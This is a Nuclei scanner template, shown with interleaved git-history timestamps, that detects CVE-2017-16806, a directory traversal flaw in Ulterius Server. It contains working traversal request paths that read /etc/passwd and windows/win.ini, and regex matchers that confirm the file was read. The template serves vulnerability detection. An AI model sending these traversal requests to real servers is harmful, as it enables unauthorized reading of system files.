nuclei-templates/http/cves/2017/CVE-2017-16806.yaml

50 lines
1.8 KiB
YAML
Raw Normal View History

2021-07-06 19:50:32 +00:00
id: CVE-2017-16806
info:
name: Ulterius Server < 1.9.5.0 - Directory Traversal
author: geeknik
severity: high
description: Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.
2023-09-06 13:22:34 +00:00
remediation: |
Upgrade Ulterius Server to version 1.9.5.0 or later to mitigate the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/43141
- https://nvd.nist.gov/vuln/detail/CVE-2017-16806
- https://github.com/Ulterius/server/commit/770d1821de43cf1d0a93c79025995bdd812a76ee
- https://www.exploit-db.com/exploits/43141/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-16806
cwe-id: CWE-22
epss-score: 0.07105
epss-percentile: 0.93842
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: ulterius
product: ulterius_server
2024-01-14 09:21:50 +00:00
tags: cve2017,cve,ulterius,traversal,edb
2021-07-06 19:50:32 +00:00
http:
2021-07-06 19:50:32 +00:00
- method: GET
path:
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"
- "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd"
matchers-condition: and
matchers:
- type: regex
2023-07-11 19:49:27 +00:00
part: body
2021-07-06 19:50:32 +00:00
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-06 19:50:32 +00:00
- "\\[(font|extension|file)s\\]"
condition: or
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 490a0046304402200ba4a0e6757347a8f45e93acf626f6b963960f94fc7cb1934493fe84196f558602205b4f7a68184fc2f970c513193e6955898cadf0658f112d2d32e77c5af8eeb3ca:922c64590222798bb761d5b6d8e72950